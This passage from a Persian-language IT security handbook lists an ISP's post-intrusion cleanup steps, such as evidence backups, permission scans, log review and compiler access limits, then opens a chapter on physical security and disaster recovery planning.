‫ﭘﺲ ﺍﺯ ﺗﻬﺎﺟﻢ‪ ISP ،‬ﺗﻤﻴﺰﻛﺎﺭﻱﻫﺎﻱ ﺯﻳﺮ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪:‬‬

‫‪50‬‬ ‫‪Cliff Stoll‬‬


‫‪51‬‬ ‫‪Classic Hacker‬‬
‫‪52‬‬ ‫‪The Cuckoo's Egg‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٧٨‬‬

‫ﻳﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻓﻮﺭﻱ ﺍﺯ ﻫﻤﻪ ﺩﻳﺴﻜﻬﺎ ﺗﻬﻴﻪ ﺷﺪ‪ .‬ﺍﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻌﻨﻮﺍﻥ ﺷﺎﻫﺪﻱ ﺑﺮ ﻛﺸﻒ ﺍﻳﻦ ﺗﺨﺮﻳﺐ ﻛـﻪ ﻧﻴـﺎﺯ ﺑـﻪ ﭘﻴﮕﻴـﺮﻱ‬ ‫•‬
‫ﺩﺍﺷﺖ ﻧﮕﻬﺪﺍﺭﻱ ﺷﺪ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﺑﺪﻧﺒﺎﻝ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺎ ﻣﺠﻮﺯﻫﺎﻱ ﺟﺪﻳﺪ ﭘﻮﻳﺶ ﺷﺪ‪ .‬ﻫﻴﭻ ﻓﺎﻳﻠﻲ ﭘﻴﺪﺍ ﻧﺸﺪ‪.‬‬ ‫•‬

‫ﺩﺳﺘﺮﺳﻴﻬﺎ ﺩﺭ ﺷﺎﺧﻪ ‪ /usr/include‬ﻭ ﻛﺎﻣﭙﺎﻳﻠﺮ ‪ C‬ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺖ ﻛﻪ ﺗﻨﻬﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﻓﺎﻳﻠﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ‬ ‫•‬
‫ﺑﺎﺷﻨﺪ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﻛﺎﻣﭙﺎﻳﻞ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺑﺎ ﻧﺴﺨﻪ ﻣﻨﺘﺸﺮﺷﺪﺓ ﺍﻭﻟﻴﻪ ﺭﻭﻱ ﺩﻳﺴﮑﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻣﻘﺎﻳﺴﻪ ﺷﺪﻧﺪ ﺗﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺣﺘﻤﺎﻟﻲ ﻣـﺸﺨﺺ ﺷـﻮﺩ‪ .‬ﺩﺭ ﺁﻧﻬـﺎ‬ ‫•‬
‫ﺗﻐﻴﻴﺮﻱ ﺍﻳﺠﺎﺩ ﻧﺸﺪﻩ ﺑﻮﺩ‪.‬‬
‫ﻫﻤﺔ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻄﻮﺭ ﺩﺳﺘﻲ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﺿﺎﻓﻪ ﻣﺸﻜﻮﻙ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ‪ .‬ﻣﻮﺭﺩﻱ ﭘﻴﺪﺍ ﻧﺸﺪ‪.‬‬ ‫•‬

‫ﭘﺲ ﺍﺯ ﻳﻚ ﻫﻔﺘﻪ ﺿﺎﺑﻄﺔ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ‪ SplitRock‬ﺭﺍ ﻣﺴﺪﻭﺩ ﻣﻲﻛﺮﺩ ﻟﻐﻮ ﺷﺪ‪.‬‬ ‫•‬
‫‪٢٧٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﺳﻮﻡ‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ" ﻫﻤﺔ ﻛﺎﺭﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺗﺎﻳﭗ ﻓﺮﺍﻣﻴﻦ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؛ ﻣﺜﻞ ﺳﺎﺧﺘﻦ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄـﺮ‪ ،‬ﻗﻔـﻞ‬
‫ﻛﺮﺩﻥ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﻣﻨﺒﻊ ﺑﺮﻕ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﺗﺎﻗﻚ ﻗﻔﻞﺷﺪﻩ ﻭ ﻣﺠﻬﺰ ﺑﻪ ﺩﻭﺭﺑﻴﻦ ﻣﺪﺍﺭﺑﺴﺘﺔ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻭ ﻣﻘﺴﻢﻫﺎﻱ ﺑﺮﻕ ﻭ ﻣﻨﺒﻊ ﺑﺮﻕ ﻭﻗﻔﻪﻧﺎﭘـﺬﻳﺮ‬
‫)‪ .٥٣(UPS‬ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻠﻪ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺳﺖ ﻏﺎﻟﺒﹰﺎ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻓﺼﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ‪ ،‬ﺧﺮﺍﺑﻜﺎﺭﻱ ﻭ ﺳﺮﻗﺖ؛ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﺮﺍﻱ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬

‫ﻋﻨﺎﺻﺮ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬

‫ﺍﻭﻝ ﻣﺮﺩﻡ‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻛﻴﺪ ﻧﻴﺴﺖ ﻛﻪ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﻭ ﺳﻮﺍﻧﺢ‪ ،‬ﺯﻧﺪﮔﻲ ﻭ ﺍﻳﻤﻨﻲ ﭘﺮﺳﻨﻞ ﻫﻤﻮﺍﺭﻩ ﺑﺎﻳﺪ ﺑﺮ ﺩﺍﺩﻩﻫﺎ ﻳﺎ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺪ ﻧﻈﺮ ﻣﻘﺪﻡ ﺑﺎﺷـﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺍﻳﻦ ﺍﺻﻞ ﺍﺳﺘﺜﻨﺎﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﺤﺪﻭﺩﻱ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻣﺜ ﹰﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﺣﺴﺎﺱ ﻧﻈﺎﻣﻲ(‪ ،‬ﺍﻣﺎ ﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﺁﻧﭽﻪ‬
‫ﺭﺍ ﻛﻪ ﺣﻘﻴﻘﺘﹰﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﺩﻭﺭ ﺩﺍﺷﺖ‪.‬‬

‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﻬﺪﻳﺪﺍﺕ ﻓﺮﺍﻣﻮﺵﺷﺪﻩ‬


‫ﺑﺎ ﻛﻤﺎﻝ ﺗﻌﺠﺐ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺗﻮﺟﻬﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﻳﻚ ﻛﺎﻧﻮﻥ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﻛﻪ ﺩﺍﺋﻤـﹰﺎ ﻣـﻮﺭﺩ ﺩﺳـﺘﺒﺮﺩ‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﺮﻓﺖ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺩﻻﺭ ﺩﺭ ﺯﻣﻴﻨﺔ ﺁﺯﻣﺎﻳﺸﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻛﺮﺩ ﺗﺎ ﺍﺯ ﻭﺭﻭﺩﻫﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﺧﻼﻝ ﺭﻭﺯ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﻣﺪﺗﻲ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﻣﺸﮑﻞ ﺁﻧﺠﺎ ﺍﺳﺖ ﮐﻪ ﺷﺒﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻧﻈﺎﻓﺘﭽﻲ ﺳﺎﻟﻦ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺭﺍ ﺗﻤﻴﺰ ﻣـﻲﻛﻨـﺪ ﺩﺭﻫـﺎﻱ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻭﺭﻭﺩﻱ ﺁﻧﺮﺍ ﺑﺎﺯ ﻣﻲﮔﺬﺍﺭﺩ‪ .‬ﻣﺠﻠﻪﺍﻱ ﺩﺭ ‪ San Francisco‬ﺩﺭ ﻃﻮﻝ ﻳﻚ ﺭﻭﺯ ﺗﻌﻄﻴﻞ ﻣﻌﺎﺩﻝ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻫﺰﺍﺭ ﺩﻻﺭ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺶ ﺑﻪ‬
‫ﺳﺮﻗﺖ ﺭﻓﺘﻨﺪ‪ ،‬ﭼﻮﻥ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﻛﺎﺭﺕ ﻛﻠﻴﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑﺮﺍﻱ ﺑﺎﺯ ﻛﺮﺩﻥ ﺩﺭﺏ ﺳﺎﺧﺘﻤﺎﻥ ﻭ ﺍﺯ ﻛﺎﺭ ﺍﻧـﺪﺍﺧﺘﻦ ﺳﻴـﺴﺘﻢ ﺍﻋـﻼﻡ‬
‫ﺧﻄﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻓﺮﺩ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻥ ﺑﻪ ﻣﻮﺗﻮﺭﺧﺎﻧﻪ ‪ -‬ﺟﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄﺮ ﺩﺭ ﺁﻧﺠـﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ‪ -‬ﺭﻓﺘـﻪ‬
‫ﺑﻮﺩ؛ ﻭ ﮔﺰﺍﺭﺵ ﻣﻜﺘﻮﺏ ﺭﺍ ﻧﻴﺰ ﺍﺯ ﭼﺎﭘﮕﺮ ﺩﺳﺘﮕﺎﻩ ﺍﻋﻼﻡ ﺧﻄﺮ ﺑﻴﺮﻭﻥ ﻛﺸﻴﺪﻩ ﻭ ﻣﻨﻬﺪﻡ ﻛﺮﺩﻩ ﺑﻮﺩ‪.‬‬
‫ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﮔﻤﺎﻥ ﻣﻲﻛﻨﻨﺪ ﻣﻮﺍﺟﻬﺔ ﺻﺤﻴﺢ ﺑﺎ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﻳﺎ ﻣﺸﻜﻞ ﺍﺳﺖ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻤﻲ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﺮﺍ ﺩﺍﺭﻧـﺪ ﻛـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺣﻤﻼﺕ ﻫﺴﺘﻪﺍﻱ‪ ،‬ﺯﻣﻴﻦﻟﺮﺯﻩﻫﺎﻱ ﺑﺰﺭﮒ‪ ،‬ﻳﺎ ﺑﻤﺐﮔﺬﺍﺭﻱﻫﺎﻱ ﺗﺮﻭﺭﻳﺴﺘﻲ ﺣﻔﺎﻇﺖ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺑـﻪ‬
‫ﺑﻬﺎﻧﺔ ﺧﻨﺜﻲ ﺷﺪﻥ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻓﺎﺟﻌﻪﺁﻣﻴﺰ‪ ،‬ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺩﻗﻴﻖ ﺑﺮﺍﻱ ﻣﻮﺍﺭﺩ ﻧﺎﮔﻮﺍﺭ ﺑﺎﺯ ﺩﺍﺭﻳﻢ‪.‬‬

‫‪53‬‬ ‫‪Uninterruptable Power Supply‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٨٠‬‬

‫ﻼ ﺑﺮﺍﻱ ﭘﺎﻳﮕﺎﻫﻬﺎ ﻳﺎ ﻣﺆﺳـﺴﺎﺕ ﻣﺨﺘﻠـﻒ‪ ،‬ﻣﺘﻔـﺎﻭﺕ‬ ‫ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺷﺎﻣﻞ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ ‪ -‬ﺗﻬﺪﻳﺪﻫﺎ‪ ،‬ﺗﺠﺎﺭﺏ‪ ،‬ﻭ ﺣﻔﺎﻇﻬﺎ ‪ -‬ﻋﻤ ﹰ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﭼﻮﻥ ﻫﺮ ﭘﺎﻳﮕﺎﻩ ﺑﺎ ﭘﺎﻳﮕﺎﻩ ﺩﻳﮕﺮ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ‪ ،‬ﺍﻳﻦ ﻓﺼﻞ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺧﺎﺹ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻳﻚ ﻧﻘﻄﻪ ﺷﺮﻭﻉ‪ ،‬ﻳﻚ ﻓﻬﺮﺳﺖ ﺍﺯ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ‪ ،‬ﻭ ﻳﻚ ﺭﻭﻳﻪ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺑﺮﺍﻱ ﻓﺮﻣﻮﻝﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪ ﻭﺍﻗﻌﻲ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﺪ‪.‬‬

‫ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬


‫ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺍﻳﻤﻦﺳﺎﺯﻱ ﻓﻴﺰﻳﻜﻲ ﺗﺄﺳﻴﺴﺎﺕ ﺷﻤﺎ ﻓﺮﻣﻮﻝﺑﻨﺪﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻜﺘﻮﺏ ﺍﺳﺖ ﻛﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻓﻌﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻭ ﺳﻤﺖ ﻭ ﺳﻮﻱ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﺷﻤﺎ ﺩﺭ ﺁﻳﻨﺪﻩ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﺪ‪ .‬ﺑﻄﻮﺭ ﺍﻳﺪﻩﺁﻝ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﻓﻴﺰﻳﻜﻲ ﺑﺎﻳﺪ ﺑﺨﺸﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻜﺘـﻮﺏ ﺷـﻤﺎ ﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ ﻃـﺮﺡ‬
‫ﺑﺮﺍﻱ ﺗﻜﺎﻣﻞ ﻻﺯﻡ ﺍﺳﺖ ﺗﻮﺳﻂ ﺳﺎﻳﺮ ﺍﻋﻀﺎ ﺧﻮﺍﻧﺪﻩ ﺷﻮﺩ‪ ،‬ﻭ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﻧﻴﺰ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺪﻑ ﺍﺯ ﺑﺮﻧﺎﻣﻪ‪،‬‬
‫ﻫﻢ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻭ ﻫﻢ ﺍﺗﺨﺎﺫ ﺗﺪﺍﺑﻴﺮ ﺳﻴﺎﺳﻲ ﺍﺳﺖ‪.‬‬
‫ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﺑﺎﻳﺪ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﻲ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺭﺯﺵ ﺁﻧﻬﺎ‪ ،‬ﻧﻘﺎﻃﻲ ﻛﻪ ﺍﻳﻦ ﺍﻗﻼﻡ ﺩﺭ ﺁﻥ ﻣﺴﺘﻘﺮ ﻫـﺴﺘﻨﺪ‪ ،‬ﺗﻬﺪﻳـﺪﻫﺎﻱ‬
‫ﺍﺣﺘﻤﺎﻟﻲ ﻛﻪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺭﺍ ﺗﻮﺻﻴﻒ ﻛﻨﺪ‪ .‬ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻜﻲ ﺍﺯ ﺍﻗﻼﻡ‬
‫ﺳﺮﻣﺎﻳﻪ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻓﻀﺎﻱ ﻣﺤﻴﻄﻲ ﺍﻣﻨﻴﺖ ‪ -‬ﺣﺪ ﻭ ﻣﺮﺯ ﻣﻴﺎﻥ ﺳﺎﻳﺮ ﻗﺴﻤﺘﻬﺎﻱ ﺟﻬﺎﻥ ﻭ ﻧﺎﺣﻴﺔ ﺍﻣﻦ ﺷـﻤﺎ ‪ -‬ﻭ‬
‫ﻫﺮ ﺣﻔﺮﻩ ﺩﺭ ﻓﻀﺎﻱ ﻣﺤﻴﻄﻲ‪ ،‬ﻫﻤﺮﺍﻩ ﺑﺎ ﺷﻴﻮﻩﻫﺎﻱ ﺩﻓﺎﻋﻲ‪ ،‬ﻃﺮﺣﻬﺎﻱ ﻣﻘﺎﻭﻡﺳﺎﺯﻱ ﺁﻧﻬﺎ‪ ،‬ﻭ ﻫﺰﻳﻨﺔ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻳﻦ ﻃﺮﺣﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﻴﺪ‪.‬‬
‫ﻼ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺑﻪ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﺍﮔﺮ ﺗﺄﺳﻴﺴﺎﺕ ﺣﻴﺎﺗﻲ ﺧﺎﺻﻲ ﺭﺍ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺑﻪ ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺗﻮﺟﻪ ﺯﻳﺎﺩﻱ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻭ ﻣﺜ ﹰ‬
‫ﺑﻴﺮﻭﻧﻲ ﻛﻪ ﺗﺨﺼﺼﺶ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮ ﺍﺳﺖ ﺑﺪﻫﻴﺪ‪ .‬ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﻳـﻚ ﻣـﺪﺭﻙ ﺣـﺴﺎﺱ ﺑـﺸﻤﺎﺭ‬
‫ﺁﻭﺭﻳﺪ؛ ﭼﺮﺍﮐﻪ ﺍﻳﻦ ﻃﺮﺡ ﻃﺒﻖ ﻃﺒﻴﻌﺖ ﺫﺍﺗﻲ‪ ،‬ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺮﻭﺡ ﺩﺭ ﻣﻮﺭﺩ ﺿﻌﻴﻒﺗﺮﻳﻦ ﻧﻘﺎﻁ ﺩﻓﺎﻋﻲ ﺷﻤﺎ ﺍﺳﺖ‪.‬‬

‫ﺑﺮﻧﺎﻣﺔ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ‬


‫ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﻓﻮﺭﻱ ﻭ ﻣﻮﻗﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺟﺪﻳﺪ ﺩﺭﺻـﻮﺭﺕ‬
‫ﺳﺮﻗﺖ ﻳﺎ ﺧﺮﺍﺑﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻮﺳﻮﻡ ﺑﻪ ﻃﺮﺡ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ‪ ٥٤‬ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ‬
‫ﺍﺟﺰﺍﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ؛ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﮐﻪ ﺣﺘﻲ ﺯﻣﺎﻧﻴﻜﻪ ﺷﻤﺎ ﺩﺭ ﻳﮏ ﭘﺎﻳﮕﺎﻩ ﺳﺎﻧﺤﻪﺩﻳـﺪﻩ ﻣـﺸﻐﻮﻝ ﺑـﻪ ﮐـﺎﺭ ﻫـﺴﺘﻴﺪ ﻭ ﻳـﺎ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻳﻚ ﺳﺎﻧﺤﻪ ﺗﺮﻣﻴﻢ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﻳﺪﻩﺁﻝ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺍﺻﻮﻝ ﺍﻳﻤﻨﻲ ﻫﻤﭽﻨﺎﻥ ﺭﻋﺎﻳﺖ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺎ ﺍﺟﺎﺭﻩ ﻛﺮﺩﻥ ﻳﺎ ﻗﺮﺽ ﮔﺮﻓﺘﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﻭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﺣﻴـﺎﻱ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺗﻨﺎﻭﺏ ﻛﻤﺘﺮ ﺗﻤﺎﻡ ﺑﺮﻧﺎﻣﺔ ﺍﺭﺯﻳﺎﺑﻲ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﺴﻬﻴﻼﺕ ﺟﺎﻳﮕﺰﻳﻦ ﺩﺭ‬
‫ﺩﺳﺘﺮﺱ ﻫﺴﺘﻨﺪ ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺩﺭﺳﺖ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫ﺳﺎﻳﺮ ﺍﺣﺘﻤﺎﻻﺕ‬
